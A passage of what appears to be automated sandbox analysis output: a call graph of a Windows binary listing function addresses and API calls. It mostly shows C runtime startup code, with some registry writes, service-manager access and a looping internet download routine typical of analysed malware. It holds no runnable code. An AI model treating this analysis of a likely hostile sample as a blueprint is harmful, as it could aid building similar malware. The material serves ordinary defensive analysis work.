402ba6 7 API calls 19130->19132 19133 402b98 12 API calls 19130->19133 19131->19128 19132->19130 19133->19130 19135 402f51 7 API calls 19134->19135 19136 402baf 19135->19136 19136->19120 19138 402eb1 12 API calls 19137->19138 19139 402ba3 19138->19139 19139->19120 19140 402227 19141 402234 RegOpenKeyExA 19140->19141 19143 4021ea RegSetValueExA 19144 40ba2b RegCloseKey 19143->19144 19145 40ba31 19144->19145 19146 2dbf170 CreateFileA 19147 2dc58e3 19146->19147 19148 2dbf030 19149 2dc00c2 19148->19149 19153 2d8f8d9 LoadLibraryA 19149->19153 19150 2dc00c7 19151 2d8f8d9 64 API calls 19150->19151 19151->19150 19154 2d8f9bc 19153->19154 19155 2d8f902 GetProcAddress 19153->19155 19154->19150 19156 2d8f9b5 FreeLibrary 19155->19156 19159 2d8f916 19155->19159 19156->19154 19157 2d8f928 GetAdaptersInfo 19157->19159 19158 2d8f9b0 19158->19156 19159->19157 19159->19158 19160 2d93a7c _Allocate 60 API calls 19159->19160 19160->19159 19161 40b9ed 19162 40b9f1 19161->19162 19165 2d93c3f 19162->19165 19166 2d93c48 19165->19166 19167 2d93c4d 19165->19167 19179 2d9b814 19166->19179 19171 2d93c62 19167->19171 19170 40b9f3 19172 2d93c6e __commit 19171->19172 19176 2d93cbc ___DllMainCRTStartup 19172->19176 19178 2d93d19 __commit 19172->19178 19183 2d93acd 19172->19183 19174 2d93cf6 19175 2d93acd __CRT_INIT@12 138 API calls 19174->19175 19174->19178 19175->19178 19176->19174 19177 2d93acd __CRT_INIT@12 138 API calls 19176->19177 19176->19178 19177->19174 19178->19170 19180 2d9b844 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 19179->19180 19181 2d9b837 19179->19181 19182 2d9b83b 19180->19182 19181->19180 19181->19182 19182->19167 19184 2d93ad9 __commit 19183->19184 19185 2d93b5b 19184->19185 19186 2d93ae1 19184->19186 19188 2d93b5f 19185->19188 19189 2d93bc4 19185->19189 19231 2d98116 GetProcessHeap 19186->19231 19193 2d93b80 19188->19193 19200 2d93aea __commit __CRT_INIT@12 19188->19200 19332 2d9838b 19188->19332 19191 2d93bc9 19189->19191 19192 2d93c27 19189->19192 19190 2d93ae6 19190->19200 19232 2d95cc4 19190->19232 19194 2d990fb __CRT_INIT@12 TlsGetValue 19191->19194 19192->19200 19363 2d95b54 19192->19363 19335 2d98262 RtlDecodePointer 19193->19335 19198 2d93bd4 19194->19198 19198->19200 19203 2d9899c __calloc_crt 59 API calls 19198->19203 19200->19176 19201 2d93af6 __RTC_Initialize 19201->19200 19208 2d93b06 GetCommandLineA 19201->19208 19205 2d93be5 19203->19205 19205->19200 19210 2d9911a __CRT_INIT@12 TlsSetValue 19205->19210 19206 2d9b4b2 __ioterm 60 API calls 19207 2d93b91 19206->19207 19211 2d95d3a __mtterm 62 API calls 19207->19211 19253 2d9b8b0 GetEnvironmentStringsW 19208->19253 19213 2d93bfd 19210->19213 19214 2d93b96 __CRT_INIT@12 19211->19214 19216 2d93c1b 19213->19216 19217 2d93c03 19213->19217 19359 2d93baf 19214->19359 19220 2d92ea4 _free 59 API calls 19216->19220 19218 2d95c11 __initptd 59 API calls 19217->19218 19221 2d93c0b GetCurrentThreadId 19218->19221 19219 2d93b20 19222 2d93b24 19219->19222 19285 2d9b504 19219->19285 19220->19200 19221->19200 19318 2d95d3a 19222->19318 19226 2d93b44 19226->19200 19327 2d9b4b2 19226->19327 19231->19190 19371 2d98432 RtlEncodePointer 19232->19371 19234 2d95cc9 19376 2d9894e 19234->19376 19237 2d95cd2 19238 2d95d3a __mtterm 62 API calls 19237->19238 19240 2d95cd7 19238->19240 19240->19201 19242 2d95cef 19243 2d9899c __calloc_crt 59 API calls 19242->19243 19244 2d95cfc 19243->19244 19245 2d95d31 19244->19245 19247 2d9911a __CRT_INIT@12 TlsSetValue 19244->19247 19246 2d95d3a __mtterm 62 API calls 19245->19246 19248 2d95d36 19246->19248 19249 2d95d10 19247->19249 19248->19201 19249->19245 19250 2d95d16 19249->19250 19251 2d95c11 __initptd 59 API calls 19250->19251 19252 2d95d1e GetCurrentThreadId 19251->19252 19252->19201 19254 2d9b8c3 WideCharToMultiByte 19253->19254 19258 2d93b16 19253->19258 19256 2d9b92d FreeEnvironmentStringsW 19254->19256 19257 2d9b8f6 19254->19257 19256->19258 19259 2d989e4 __malloc_crt 59 API calls 19257->19259 19266 2d9b1fe 19258->19266 19260 2d9b8fc 19259->19260 19260->19256 19261 2d9b903 WideCharToMultiByte 19260->19261 19262 2d9b919 19261->19262 19263 2d9b922 FreeEnvironmentStringsW 19261->19263 19264 2d92ea4 _free 59 API calls 19262->19264 19263->19258 19265 2d9b91f 19264->19265 19265->19263 19267 2d9b20a __commit 19266->19267 19268 2d9881d __lock 59 API calls 19267->19268 19269 2d9b211 19268->19269 19270 2d9899c __calloc_crt 59 API calls 19269->19270 19272 2d9b222 19270->19272 19271 2d9b28d GetStartupInfoW 19275 2d9b3d1 19271->19275 19281 2d9b2a2 19271->19281 19272->19271 19273 2d9b22d __commit @_EH4_CallFilterFunc@8 19272->19273 19273->19219 19274 2d9b499 19384 2d9b4a9 19274->19384 19275->19274 19279 2d9b41e GetStdHandle 19275->19279 19280 2d9b431 GetFileType 19275->19280 19284 2d9913c __ioinit InitializeCriticalSectionAndSpinCount 19275->19284 19277 2d9b2f0 19277->19275 19282 2d9b324 GetFileType 19277->19282 19283 2d9913c __ioinit InitializeCriticalSectionAndSpinCount 19277->19283 19278 2d9899c __calloc_crt 59 API calls 19278->19281 19279->19275 19280->19275 19281->19275 19281->19277 19281->19278 19282->19277 19283->19277 19284->19275 19286 2d9b512 19285->19286 19287 2d9b517 GetModuleFileNameA 19285->19287 19394 2d951ba 19286->19394 19288 2d9b544 19287->19288 19388 2d9b5b7 19288->19388 19291 2d93b30 19291->19226 19296 2d9b733 19291->19296 19293 2d989e4 __malloc_crt 59 API calls 19294 2d9b57d 19293->19294 19294->19291 19295 2d9b5b7 _parse_cmdline 59 API calls 19294->19295 19295->19291 19297 2d9b73c 19296->19297 19299 2d9b741 _strlen 19296->19299 19298 2d951ba ___initmbctable 71 API calls 19297->19298 19298->19299 19300 2d9899c __calloc_crt 59 API calls 19299->19300 19303 2d93b39 19299->19303 19301 2d9b777 _strlen 19300->19301 19301->19303 19304 2d9899c __calloc_crt 59 API calls 19301->19304 19305 2d9b7c9 19301->19305 19306 2d9b7f0 19301->19306 19309 2d9b807 19301->19309 19558 2d96bec 19301->19558 19303->19226 19312 2d9839a 19303->19312 19304->19301 19313 2d983a6 __IsNonwritableInCurrentImage 19312->19313 19319 2d95d44 19318->19319 19321 2d95d4a 19318->19321 19570 2d990dc 19319->19570 19322 2d98883 19321->19322 19323 2d98867 RtlDeleteCriticalSection 19321->19323 19325 2d9888f RtlDeleteCriticalSection 19322->19325 19326 2d988a2 19322->19326 19324 2d92ea4 _free 59 API calls 19323->19324 19324->19321 19325->19322 19326->19200 19328 2d9b4b9 19327->19328 19329 2d9b501 19328->19329 19330 2d92ea4 _free 59 API calls 19328->19330 19331 2d9b4d2 RtlDeleteCriticalSection 19328->19331 19329->19222 19330->19328 19331->19328 19333 2d984d4 _doexit 59 API calls 19332->19333 19334 2d98396 19333->19334 19334->19193 19336 2d9827c 19335->19336 19337 2d9828e 19335->19337 19336->19337 19339 2d92ea4 _free 59 API calls 19336->19339 19338 2d92ea4 _free 59 API calls 19337->19338 19340 2d9829b 19338->19340 19339->19336 19341 2d982bf 19340->19341 19344 2d92ea4 _free 59 API calls 19340->19344 19342 2d92ea4 _free 59 API calls 19341->19342 19343 2d982cb 19342->19343 19345 2d92ea4 _free 59 API calls 19343->19345 19344->19340 19346 2d982dc 19345->19346 19347 2d92ea4 _free 59 API calls 19346->19347 19348 2d982e7 19347->19348 19349 2d9830c RtlEncodePointer 19348->19349 19353 2d92ea4 _free 59 API calls 19348->19353 19350 2d98327 19349->19350 19351 2d98321 19349->19351 19352 2d9833d 19350->19352 19355 2d92ea4 _free 59 API calls 19350->19355 19354 2d92ea4 _free 59 API calls 19351->19354 19356 2d93b85 19352->19356 19358 2d92ea4 _free 59 API calls 19352->19358 19357 2d9830b 19353->19357 19354->19350 19355->19352 19356->19206 19356->19214 19357->19349 19358->19356 19360 2d93bc1 19359->19360 19361 2d93bb3 19359->19361 19360->19200 19361->19360 19362 2d95d3a __mtterm 62 API calls 19361->19362 19362->19360 19364 2d95b87 19363->19364 19365 2d95b61 19363->19365 19364->19200 19366 2d95b6f 19365->19366 19367 2d990fb __CRT_INIT@12 TlsGetValue 19365->19367 19368 2d9911a __CRT_INIT@12 TlsSetValue 19366->19368 19367->19366 19369 2d95b7f 19368->19369 19573 2d95a1f 19369->19573 19372 2d98443 __init_pointers __initp_misc_winsig 19371->19372 19383 2d93937 RtlEncodePointer 19372->19383 19374 2d9845b __init_pointers 19375 2d991aa 34 API calls 19374->19375 19375->19234 19379 2d9895a 19376->19379 19377 2d9913c __ioinit InitializeCriticalSectionAndSpinCount 19377->19379 19378 2d95cce 19378->19237 19380 2d990be 19378->19380 19379->19377 19379->19378 19381 2d95ce4 19380->19381 19382 2d990d5 TlsAlloc 19380->19382 19381->19237 19381->19242 19383->19374 19387 2d98987 RtlLeaveCriticalSection 19384->19387 19386 2d9b4b0 19386->19273 19387->19386 19390 2d9b5d9 19388->19390 19392 2d9b63d 19390->19392 19398 2da1516 19390->19398 19391 2d9b55a 19391->19291 19391->19293 19392->19391 19393 2da1516 _parse_cmdline 59 API calls 19392->19393 19393->19392 19395 2d951c3 19394->19395 19396 2d951ca 19394->19396 19454 2d95517 19395->19454 19396->19287 19401 2da14bc 19398->19401 19404 2d921ab 19401->19404 19405 2d921bc 19404->19405 19411 2d92209 19404->19411 19412 2d95b8a 19405->19412 19411->19390 19413 2d95ba2 __getptd_noexit 59 API calls 19412->19413 19414 2d95b90 19413->19414 19415 2d921c2 19414->19415 19416 2d9836f __amsg_exit 59 API calls 19414->19416 19416->19415 19455 2d95523 __commit 19454->19455 19456 2d95b8a __write_nolock 59 API calls 19455->19456 19457 2d9552b 19456->19457 19458 2d95471 __setmbcp 59 API calls 19457->19458 19459 2d95535 19458->19459 19479 2d95212 19459->19479 19480 2d921ab _LocaleUpdate::_LocaleUpdate 59 API calls 19479->19480 19481 2d95222 19480->19481 19571 2d990f3 TlsFree 19570->19571 19572 2d990ef 19570->19572 19571->19321 19572->19321 19574 2d95a2b __commit 19573->19574 19575 2d95a44 19574->19575 19576 2d95b33 __commit 19574->19576 19577 2d92ea4 _free 59 API calls 19574->19577 19578 2d95a53 19575->19578 19580 2d92ea4 _free 59 API calls 19575->19580 19576->19364 19577->19575 19579 2d95a62 19578->19579 19581 2d92ea4 _free 59 API calls 19578->19581 19582 2d95a71 19579->19582 19583 2d92ea4 _free 59 API calls 19579->19583 19580->19578 19581->19579 19584 2d95a80 19582->19584 19585 2d92ea4 _free 59 API calls 19582->19585 19583->19582 19586 2d95a8f 19584->19586 19588 2d92ea4 _free 59 API calls 19584->19588 19585->19584 19587 2d95a9e 19586->19587 19589 2d92ea4 _free 59 API calls 19586->19589 19590 2d95ab0 19587->19590 19591 2d92ea4 _free 59 API calls 19587->19591 19588->19586 19589->19587 19592 2d9881d __lock 59 API calls 19590->19592 19591->19590 19593 2d95ab8 19592->19593 19597 2d92ea4 _free 59 API calls 19593->19597 19598 2d95adb 19593->19598 19596 2d9881d __lock 59 API calls 19603 2d95aef ___removelocaleref 19596->19603 19597->19598 19605 2d95b3f 19598->19605 19599 2d95b20 19638 2d95b4b 19599->19638 19602 2d92ea4 _free 59 API calls 19602->19576 19603->19599 19608 2d94ef5 19603->19608 19641 2d98987 RtlLeaveCriticalSection 19605->19641 19607 2d95ae8 19607->19596 19609 2d94f6e 19608->19609 19611 2d94f0a 19608->19611 19610 2d94fbb 19609->19610 19612 2d92ea4 _free 59 API calls 19609->19612 19632 2d94fe4 19610->19632 19682 2d9d46d 19610->19682 19611->19609 19618 2d92ea4 _free 59 API calls 19611->19618 19633 2d94f3b 19611->19633 19614 2d94f8f 19612->19614 19616 2d92ea4 _free 59 API calls 19614->19616 19620 2d94fa2 19616->19620 19617 2d92ea4 _free 59 API calls 19617->19632 19623 2d94f30 19618->19623 19619 2d95043 19624 2d92ea4 _free 59 API calls 19619->19624 19626 2d92ea4 _free 59 API calls 19620->19626 19621 2d92ea4 _free 59 API calls 19622 2d94f63 19621->19622 19627 2d92ea4 _free 59 API calls 19622->19627 19642 2d9d30a 19623->19642 19629 2d95049 19624->19629 19625 2d92ea4 _free 59 API calls 19630 2d94f4e 19625->19630 19631 2d94fb0 19626->19631 19627->19609 19629->19599 19670 2d9d406 19630->19670 19635 2d92ea4 _free 59 API calls 19631->19635 19632->19619 19636 2d92ea4 59 API calls _free 19632->19636 19633->19625 19637 2d94f59 19633->19637 19635->19610 19636->19632 19637->19621 19858 2d98987 RtlLeaveCriticalSection 19638->19858 19640 2d95b2d 19640->19602 19641->19607 19643 2d9d319 19642->19643 19669 2d9d402 19642->19669 19644 2d92ea4 _free 59 API calls 19643->19644 19646 2d9d32a 19643->19646 19644->19646 19645 2d9d34e 19649 2d9d360 19645->19649 19651 2d92ea4 _free 59 API calls 19645->19651 19647 2d92ea4 _free 59 API calls 19646->19647 19650 2d9d33c 19646->19650 19647->19650 19648 2d92ea4 _free 59 API calls 19648->19645 19652 2d9d372 19649->19652 19653 2d92ea4 _free 59 API calls 19649->19653 19650->19645 19650->19648 19651->19649 19654 2d9d384 19652->19654 19656 2d92ea4 _free 59 API calls 19652->19656 19653->19652 19655 2d9d396 19654->19655 19657 2d92ea4 _free 59 API calls 19654->19657 19658 2d9d3a8 19655->19658 19659 2d92ea4 _free 59 API calls 19655->19659 19656->19654 19657->19655 19660 2d9d3ba 19658->19660 19661 2d92ea4 _free 59 API calls 19658->19661 19659->19658 19661->19660 19669->19633 19671 2d9d411 19670->19671 19681 2d9d469 19670->19681 19672 2d9d421 19671->19672 19673 2d92ea4 _free 59 API calls 19671->19673 19674 2d9d433 19672->19674 19676 2d92ea4 _free 59 API calls 19672->19676 19673->19672 19675 2d9d445 19674->19675 19677 2d92ea4 _free 59 API calls 19674->19677 19678 2d9d457 19675->19678 19679 2d92ea4 _free 59 API calls 19675->19679 19676->19674 19677->19675 19680 2d92ea4 _free 59 API calls 19678->19680 19678->19681 19679->19678 19680->19681 19681->19637 19683 2d94fd9 19682->19683 19684 2d9d47c 19682->19684 19683->19617 19685 2d92ea4 _free 59 API calls 19684->19685 19686 2d9d484 19685->19686 19687 2d92ea4 _free 59 API calls 19686->19687 19688 2d9d48c 19687->19688 19689 2d92ea4 _free 59 API calls 19688->19689 19690 2d9d494 19689->19690 19691 2d92ea4 _free 59 API calls 19690->19691 19692 2d9d49c 19691->19692 19693 2d92ea4 _free 59 API calls 19692->19693 19694 2d9d4a4 19693->19694 19858->19640 19859 2dbf4b6 CreateFileA 19860 40b32f 19861 40b333 19860->19861 19862 40b2d5 OpenSCManagerA 19861->19862 19865 40b2cb CreateDirectoryA 19861->19865 19866 2dbfa2f Sleep 19867 2dd96eb 19866->19867 19868 40b2b6 19869 40b429 RegQueryValueExA 19868->19869 19872 40234f 19869->19872 19870 40b956 19871 402675 RegCloseKey 19871->19872 19872->19870 19872->19871 19873 2d87ba0 19875 2d87b95 19873->19875 19907 2d866f0 _memset 19873->19907 19876 2d8670a RtlEnterCriticalSection RtlLeaveCriticalSection 19876->19907 19877 2d86704 Sleep 19877->19876 19878 2d872a7 InternetOpenA 19879 2d872c5 InternetSetOptionA InternetSetOptionA InternetSetOptionA 19878->19879 19878->19907 19883 2d8733e _memset 19879->19883 19880 2d8731e InternetOpenUrlA 19881 2d8737e InternetCloseHandle 19880->19881 19880->19883 19881->19907 19882 2d87342 InternetReadFile 19882->19883 19884 2d87373 InternetCloseHandle 19882->19884 19883->19880 19883->19882 19884->19881 19885 2d873e5 RtlEnterCriticalSection RtlLeaveCriticalSection 19918 2d9226c 19885->19918 19887 2d92edc _malloc 59 API calls 19888 2d87499 RtlEnterCriticalSection RtlLeaveCriticalSection 19887->19888 19888->19907 19889 2d9226c 66 API calls 19889->19907 19890 2d87766 RtlEnterCriticalSection RtlLeaveCriticalSection 19890->19907 19892 2d92edc 59 API calls _malloc 19892->19907 19895 2d878de RtlEnterCriticalSection 19896 2d8790b RtlLeaveCriticalSection 19895->19896 19895->19907 20021 2d83c67 19896->20021 19900 2d93516 60 API calls _strtok 19900->19907 19901 2d8a657 73 API calls 19901->19907 19902 2d92ea4 59 API calls _free 19902->19907 19904 2d93a7c _Allocate 60 API calls 19904->19907 19907->19876 19907->19877 19907->19878 19907->19885 19907->19887 19907->19889 19907->19890 19907->19892 19907->19895 19907->19896 19907->19900 19907->19901 19907->19902 19907->19904 19914 2d876e8 Sleep 19907->19914 19916 2d876e3 shared_ptr 19907->19916 19928 2d861f1 19907->19928 19931 2d8534d 19907->19931 19941 2d92780 19907->19941 19944 2d89669 19907->19944 19951 2d8a781 19907->19951 19955 2d85119 19907->19955 19984 2d8ab41 19907->19984 20002 2d92348 19907->20002 20013 2d81ba7 19907->20013 20028 2d83d7e 19907->20028 20035 2d8826d 19907->20035 20041 2d8d049 19907->20041 20046 2d8831c 19907->20046 20054 2d833b2 19907->20054 20061 2d88f35 19907->20061 19994 2d91820 19914->19994 19916->19907 19916->19914 19998 2d84100 19916->19998 19919 2d9229b 19918->19919 19921 2d92278 19918->19921 20068 2d922b3 19919->20068 19920 2d9227e 19923 2d95d8b __mbsnbcmp_l 59 API calls 19920->19923 19921->19919 19921->19920 19925 2d92283 19923->19925 19924 2d922ae 19924->19907 19926 2d94e25 __mbsnbcmp_l 9 API calls 19925->19926 19927 2d9228e 19926->19927 19927->19907 19929 2d92edc _malloc 59 API calls 19928->19929 19930 2d86204 19929->19930 19932 2d92edc _malloc 59 API calls 19931->19932 19933 2d85362 SHGetSpecialFolderPathA 19932->19933 19934 2d85378 19933->19934 20078 2d936a1 19934->20078 19938 2d853dc 20094 2d939b4 19938->20094 19940 2d853e2 19940->19907 20562 2d9279e 19941->20562 19943 2d92799 19943->19907 19945 2d89673 __EH_prolog 19944->19945 19946 2d81ba7 4 API calls 19945->19946 19947 2d896c8 19946->19947 19948 2d896e5 RtlEnterCriticalSection 19947->19948 19949 2d89700 19948->19949 19950 2d89703 RtlLeaveCriticalSection 19948->19950 19949->19950 19950->19907 19952 2d8a78b __EH_prolog 19951->19952 20568 2d8df32 19952->20568 19954 2d8a7a9 shared_ptr 19954->19907 19956 2d85123 __EH_prolog 19955->19956 20572 2d90a40 19956->20572 19959 2d83c67 72 API calls 19960 2d8514a 19959->19960 19961 2d83d7e 64 API calls 19960->19961 19962 2d85158 19961->19962 19963 2d8826d 89 API calls 19962->19963 19964 2d8516c 19963->19964 19965 2d85322 shared_ptr 19964->19965 20576 2d8a657 19964->20576 19965->19907 19968 2d851c4 19971 2d8a657 73 API calls 19968->19971 19969 2d851f6 19970 2d8a657 73 API calls 19969->19970 19972 2d85207 19970->19972 19973 2d851d4 19971->19973 19972->19965 19974 2d8a657 73 API calls 19972->19974 19973->19965 19976 2d8a657 73 API calls 19973->19976 19975 2d8524a 19974->19975 19975->19965 19978 2d8a657 73 API calls 19975->19978 19977 2d852b4 19976->19977 19977->19965 19979 2d8a657 73 API calls 19977->19979 19978->19973 19980 2d852da 19979->19980 19980->19965 19981 2d8a657 73 API calls 19980->19981 19982 2d85304 19981->19982 20581 2d8ce0b 19982->20581 19985 2d8ab4b __EH_prolog 19984->19985 20632 2d8d020 19985->20632 19987 2d8ab6c shared_ptr 20635 2d92020 19987->20635 19989 2d8ab83 19990 2d8ab99 19989->19990 20641 2d83fb0 19989->20641 19990->19907 19995 2d9182d 19994->19995 19996 2d91851 19994->19996 19995->19996 19997 2d91841 GetProcessHeap HeapFree 19995->19997 19996->19916 19997->19996 19999 2d84118 19998->19999 20000 2d84112 19998->20000 19999->19916 20880 2d8a635 20000->20880 20003 2d92379 20002->20003 20004 2d92364 20002->20004 20003->20004 20006 2d92380 20003->20006 20005 2d95d8b __mbsnbcmp_l 59 API calls 20004->20005 20007 2d92369 20005->20007 20882 2d95f80 20006->20882 20009 2d94e25 __mbsnbcmp_l 9 API calls 20007->20009 20011 2d92374 20009->20011 20011->19907 20012 2d95e31 __flsbuf 79 API calls 20012->20011 20906 2da5330 20013->20906 20015 2d81bb1 RtlEnterCriticalSection 20016 2d81be9 RtlLeaveCriticalSection 20015->20016 20018 2d81bd1 20015->20018 20017 2d81bfa RtlEnterCriticalSection 20016->20017 20020 2d81c22 20017->20020 20018->20016 20019 2d81c55 RtlLeaveCriticalSection 20018->20019 20019->19907 20020->20019 20022 2d90a40 Mailbox 68 API calls 20021->20022 20023 2d83c7e 20022->20023 20907 2d83ca2 20023->20907 20029 2d83d99 htons 20028->20029 20030 2d83dcb htons 20028->20030 20953 2d83bd3 20029->20953 20959 2d83c16 20030->20959 20034 2d83ded 20034->19907 20036 2d882a6 20035->20036 20037 2d88285 20035->20037 20040 2d882cb 20036->20040 20993 2d82ac7 20036->20993 20990 2d8952f 20037->20990 20040->19907 20042 2d90a40 Mailbox 68 API calls 20041->20042 20043 2d8d05f 20042->20043 20044 2d8d14d 20043->20044 20045 2d82db5 73 API calls 20043->20045 20044->19907 20045->20043 20047 2d88337 WSASetLastError shutdown 20046->20047 20048 2d88327 20046->20048 20050 2d8a43b 69 API calls 20047->20050 20049 2d90a40 Mailbox 68 API calls 20048->20049 20053 2d8832c 20049->20053 20051 2d88354 20050->20051 20052 2d90a40 Mailbox 68 API calls 20051->20052 20051->20053 20052->20053 20053->19907 20055 2d833e1 20054->20055 20056 2d833c4 InterlockedCompareExchange 20054->20056 20057 2d829ee 76 API calls 20055->20057 20056->20055 20058 2d833d6 20056->20058 20059 2d833f1 20057->20059 21087 2d832ab 20058->21087 20059->19907 20062 2d88f3f __EH_prolog 20061->20062 21135 2d8373f 20062->21135 20064 2d88f59 RtlEnterCriticalSection 20066 2d88f68 RtlLeaveCriticalSection 20064->20066 20067 2d88fa2 20066->20067 20067->19907 20069 2d921ab _LocaleUpdate::_LocaleUpdate 59 API calls 20068->20069 20070 2d922c7 20069->20070 20071 2d922d5 20070->20071 20077 2d922ec 20070->20077 20072 2d95d8b __mbsnbcmp_l 59 API calls 20071->20072 20073 2d922da 20072->20073 20074 2d94e25 __mbsnbcmp_l 9 API calls 20073->20074 20075 2d922e5 ___ascii_stricmp 20074->20075 20075->19924 20076 2d958aa 66 API calls __tolower_l 20076->20077 20077->20075 20077->20076 20107 2d935dd 20078->20107 20080 2d853c8 20080->19940 20081 2d93836 20080->20081 20082 2d93842 __commit 20081->20082 20083 2d93878 20082->20083 20084 2d93860 20082->20084 20086 2d93870 __commit 20082->20086 20257 2d99722 20083->20257 20085 2d95d8b __mbsnbcmp_l 59 API calls 20084->20085 20088 2d93865 20085->20088 20086->19938 20091 2d94e25 __mbsnbcmp_l 9 API calls 20088->20091 20091->20086 20095 2d939c0 __commit 20094->20095 20096 2d939ec 20095->20096 20097 2d939d4 20095->20097 20100 2d99722 __lock_file 60 API calls 20096->20100 20103 2d939e4 __commit 20096->20103 20098 2d95d8b __mbsnbcmp_l 59 API calls 20097->20098 20099 2d939d9 20098->20099 20101 2d94e25 __mbsnbcmp_l 9 API calls 20099->20101 20102 2d939fe 20100->20102 20101->20103 20485 2d93948 20102->20485 20103->19940 20110 2d935e9 __commit 20107->20110 20108 2d935fb 20109 2d95d8b __mbsnbcmp_l 59 API calls 20108->20109 20112 2d93600 20109->20112 20110->20108 20111 2d93628 20110->20111 20126 2d997f8 20111->20126 20114 2d94e25 __mbsnbcmp_l 9 API calls 20112->20114 20121 2d9360b __commit @_EH4_CallFilterFunc@8 20114->20121 20115 2d9362d 20116 2d93643 20115->20116 20117 2d93636 20115->20117 20119 2d9366c 20116->20119 20120 2d9364c 20116->20120 20118 2d95d8b __mbsnbcmp_l 59 API calls 20117->20118 20118->20121 20141 2d99917 20119->20141 20122 2d95d8b __mbsnbcmp_l 59 API calls 20120->20122 20121->20080 20122->20121 20127 2d99804 __commit 20126->20127 20128 2d9881d __lock 59 API calls 20127->20128 20138 2d99812 20128->20138 20129 2d99886 20171 2d9990e 20129->20171 20130 2d9988d 20132 2d989e4 __malloc_crt 59 API calls 20130->20132 20134 2d99894 20132->20134 20133 2d99903 __commit 20133->20115 20134->20129 20136 2d9913c __ioinit InitializeCriticalSectionAndSpinCount 20134->20136 20139 2d998ba RtlEnterCriticalSection 20136->20139 20137 2d988a5 __mtinitlocknum 59 API calls 20137->20138 20138->20129 20138->20130 20138->20137 20161 2d99761 20138->20161 20166 2d997cb 20138->20166 20139->20129 20149 2d99934 20141->20149 20142 2d99948 20143 2d95d8b __mbsnbcmp_l 59 API calls 20142->20143 20144 2d9994d 20143->20144 20145 2d94e25 __mbsnbcmp_l 9 API calls 20144->20145 20148 2d93677 20145->20148 20146 2d99b4b 20182 2da0770 20146->20182 20158 2d93699 20148->20158 20149->20142 20157 2d99aef 20149->20157 20176 2da078e 20149->20176 20154 2da08bd __openfile 59 API calls 20155 2d99b07 20154->20155 20156 2da08bd __openfile 59 API calls 20155->20156 20155->20157 20156->20157 20157->20142 20157->20146 20250 2d99791 20158->20250 20160 2d9369f 20160->20121 20162 2d9976c 20161->20162 20163 2d99782 RtlEnterCriticalSection 20161->20163 20164 2d9881d __lock 59 API calls 20162->20164 20163->20138 20165 2d99775 20164->20165 20165->20138 20167 2d997d9 20166->20167 20168 2d997ec RtlLeaveCriticalSection 20166->20168 20174 2d98987 RtlLeaveCriticalSection 20167->20174 20168->20138 20170 2d997e9 20170->20138 20175 2d98987 RtlLeaveCriticalSection 20171->20175 20173 2d99915 20173->20133 20174->20170 20175->20173 20185 2da07a6 20176->20185 20178 2d99ab5 20178->20142 20179 2da08bd 20178->20179 20193 2da08d5 20179->20193 20181 2d99ae8 20181->20154 20181->20157 20200 2da0659 20182->20200 20184 2da0789 20184->20148 20186 2da07bb 20185->20186 20187 2da07b4 20185->20187 20188 2d921ab _LocaleUpdate::_LocaleUpdate 59 API calls 20186->20188 20187->20178 20189 2da07c8 20188->20189 20189->20187 20190 2d95d8b __mbsnbcmp_l 59 API calls 20189->20190 20191 2da07fb 20190->20191 20192 2d94e25 __mbsnbcmp_l 9 API calls 20191->20192 20192->20187 20194 2d921ab _LocaleUpdate::_LocaleUpdate 59 API calls 20193->20194 20195 2da08e8 20194->20195 20196 2d95d8b __mbsnbcmp_l 59 API calls 20195->20196 20199 2da08fd 20195->20199 20197 2da0929 20196->20197 20198 2d94e25 __mbsnbcmp_l 9 API calls 20197->20198 20198->20199 20199->20181 20202 2da0665 __commit 20200->20202 20201 2da067b 20203 2d95d8b __mbsnbcmp_l 59 API calls 20201->20203 20202->20201 20204 2da06b1 20202->20204 20205 2da0680 20203->20205 20211 2da0722 20204->20211 20207 2d94e25 __mbsnbcmp_l 9 API calls 20205->20207 20209 2da068a __commit 20207->20209 20209->20184 20220 2d98166 20211->20220 20213 2da06cd 20216 2da06f6 20213->20216 20214 2da0736 20214->20213 20215 2d92ea4 _free 59 API calls 20214->20215 20215->20213 20217 2da06fc 20216->20217 20219 2da0720 20216->20219 20249 2da0f6d RtlLeaveCriticalSection 20217->20249 20219->20209 20221 2d98189 20220->20221 20222 2d98173 20220->20222 20221->20222 20223 2d98190 ___crtIsPackagedApp 20221->20223 20224 2d95d8b __mbsnbcmp_l 59 API calls 20222->20224 20227 2d98199 AreFileApisANSI 20223->20227 20228 2d981a6 MultiByteToWideChar 20223->20228 20225 2d98178 20224->20225 20226 2d94e25 __mbsnbcmp_l 9 API calls 20225->20226 20229 2d98182 20226->20229 20227->20228 20230 2d981a3 20227->20230 20231 2d981d1 20228->20231 20232 2d981c0 GetLastError 20228->20232 20229->20214 20230->20228 20234 2d989e4 __malloc_crt 59 API calls 20231->20234 20241 2d95d6a 20232->20241 20235 2d981d9 20234->20235 20235->20229 20236 2d981e0 MultiByteToWideChar 20235->20236 20236->20229 20237 2d981f6 GetLastError 20236->20237 20238 2d95d6a __dosmaperr 59 API calls 20237->20238 20239 2d98202 20238->20239 20240 2d92ea4 _free 59 API calls 20239->20240 20240->20229 20246 2d95d57 20241->20246 20243 2d95d73 _free 20244 2d95d8b __mbsnbcmp_l 59 API calls 20243->20244 20245 2d95d86 20244->20245 20245->20229 20247 2d95ba2 __getptd_noexit 59 API calls 20246->20247 20248 2d95d5c 20247->20248 20248->20243 20249->20219 20251 2d997bf RtlLeaveCriticalSection 20250->20251 20252 2d997a0 20250->20252 20251->20160 20252->20251 20253 2d997a7 20252->20253 20256 2d98987 RtlLeaveCriticalSection 20253->20256 20255 2d997bc 20255->20160 20256->20255 20258 2d99732 20257->20258 20259 2d99754 RtlEnterCriticalSection 20257->20259 20258->20259 20261 2d9973a 20258->20261 20260 2d9387e 20259->20260 20263 2d936dd 20260->20263 20262 2d9881d __lock 59 API calls 20261->20262 20262->20260 20266 2d936ec 20263->20266 20270 2d9370a 20263->20270 20264 2d936fa 20265 2d95d8b __mbsnbcmp_l 59 API calls 20264->20265 20267 2d936ff 20265->20267 20266->20264 20266->20270 20274 2d93724 _memmove 20266->20274 20268 2d94e25 __mbsnbcmp_l 9 API calls 20267->20268 20268->20270 20275 2d938b0 20270->20275 20274->20270 20278 2d9a71f 20274->20278 20284 2d99d61 20274->20284 20291 2d99d85 20274->20291 20319 2d95e31 20274->20319 20276 2d99791 __fsopen 2 API calls 20275->20276 20277 2d938b6 20276->20277 20277->20086 20279 2d9a732 20278->20279 20283 2d9a756 20278->20283 20280 2d99d61 __fflush_nolock 59 API calls 20279->20280 20279->20283 20281 2d9a74f 20280->20281 20282 